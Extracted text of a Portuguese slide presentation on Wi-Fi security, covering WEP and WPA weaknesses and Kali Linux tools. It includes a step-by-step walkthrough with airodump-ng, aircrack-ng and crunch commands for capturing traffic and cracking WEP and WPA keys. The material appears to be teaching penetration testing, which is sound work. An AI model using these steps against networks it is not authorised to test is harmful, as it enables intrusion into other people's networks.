Almir Emlio 1

Almir Emlio Vieira Diniz

Formao
Engenharia de Telecomunicaes pela Faculdade do Noroeste de Minas FINOM (12/2009)
Ps-Graduao Lato Sensu em Gesto Ambiental e Docncia do Ensino Superior pela
Faculdade do Noroeste de Minas FINOM
Ps-Graduao Lato Sensu em Engenharia de Segurana do Trabalho
Qualificaes
RH 033 - Red Hat Linux System Operation,
RH 133 Red Hat Linux System Administration
Segurana na Internet
Almir Emlio
2
Almir Emlio
3
Almir Emlio
4
Vantagens:
Facilidade de conexo
Mobilidade
Flexibilidade
Problemas:
Tamanho da banda
Interferncia
Alcane do Sinal
SEGURANA
Objetivos:
Analisar as falhas das criptografias WEP e
WPA, adotadas na segurana s redes Wi-
Fi, analisando suas vulnerabilidades, as
tcnicas de ataques e as ferramentas mais
utilizadas.
Almir Emlio
5
Protocolos de Segurana para redes
Wi-Fi
WEP (Wired Equivalent Privacy) - 1997
IV = 24 bits
RC4
exemplo: 5 bytes = {(5 x 8bits) + 24 bits IV}
chave de 64 bits
Chave simtrica
IV de 24 bits = = 16.777.216
CRC-32 no detecta erros que no modifiquem ICV
Almir Emlio
6
Autenticao chave WEP
Almir Emlio
7
WPA (Wi-Fi Protected Access) 2003
chaves TKIP (temporal Key Integrity Protocol)
chaves PSK (Pre-Shared Key)
IV de 48 bits ao invs de 24 bits
autencicao de usurio
WPA 2 (Wi-Fi Protected Access) 2004
chaves AES ( Advanced Encryption Standard)
Almir Emlio
8
Protocolos de Segurana para redes Wi-Fi
Apresentao Kali Linux
Sucessor do Back Track, uma ferramenta
voltada para testes de penetrao muito
utilizado por auditores, analistas de segurana
de redes e sistemas.
mais de 300 ferramentas de testes de
penetrao
Kali Linux totalmente livre (software de
cdigo aberto)
Almir Emlio
9
Ferramentas de teste de penetrao
airodump-ng: coloca o trfego do ar em um
arquivo.cap e mostra informaes das redes
ifconfig: mostra configuraes das placas
instaladas no computador
iwconfig: similar ao ifconfig, porem permite a
troca de configuraes dos hardware das placas.
Almir Emlio
10
Ferramentas de teste de penetrao
aircrack-ng: quebra chaves WEP e WPA, usando
fora bruta ou ataque de dicionrio.
airplay-ng: injeo de pacotes na rede
crunch: cria lista de palavras (wordlist), de
acordo com parmetros especificados.
Almir Emlio
11
Siglas:
ESSID Extended service set identifier (Identificador
de conjunto de servio protocolado)
BSSID Basic Service Set Indentifier (Identificador de
Ajuste de Servio Bsico)
AP Access Point
IP Internet Protocol
MAC- Media Access Control (Controle de Acesso )
Almir Emlio
12
PASSO A PASSO
comando:
# ifconfig = verifica as interfaces ativas no pc
Voc usar a interface sem fio.
# ifconfig wlan0 down = derruba a interface de rede
# iwconfig wlan0 mode monitor = coloca a interface em
modo monitor
# ifconfig wlan0 up = habilita novamente a interface de
rede
# airodump-ng wlan0 = mostra toda rede ao alcance da
placa de rede sem fio
Almir Emlio
13
PASSO A PASSO
# airodump-ng --bssid (mac do Aces Point) c (canal
da rede) w (nome do arquivo) wlan0 (interface)
-> depois de juntar cerca de 20 mil pacotes pode usar o
aircrack-ng
--senha WEP
# aircrack-ng y (nome do arquivo que vc capturou)-
*.cap
-> detalhe: no esquea de colocar a extenso do
arquivo (-*.cap)
Almir Emlio
14
PASSO A PASSO
Depois disso s esperar o sistema descobrir a senha,
o tempo varia de acordo com a quantidade de
pacotes capturados (IV), e da complexidade da
senha WEP.
Almir Emlio
15
SENHA WPA
Usa-se os mesmos comandos porem usa-se uma
wordlist, podendo ser criada ou baixada.
CRIAR WORDLIST = comando crunch
Exemplo:
#crunch 8 8 abcdef >> /root/nome
Cria uma lista com no mnimo 8 caracteres e no
mximo 8 caracteres, usando as letras abcdef
>> /root/ = local onde ser criado a lista
Nome: nome que voc escolhe para o arquivo
Almir Emlio
16
USANDO AIRCRACK-NG COM SENHA WPA
# aircrack-ng (arquivos capturados)-*.cap w (lista
criada)
Almir Emlio
17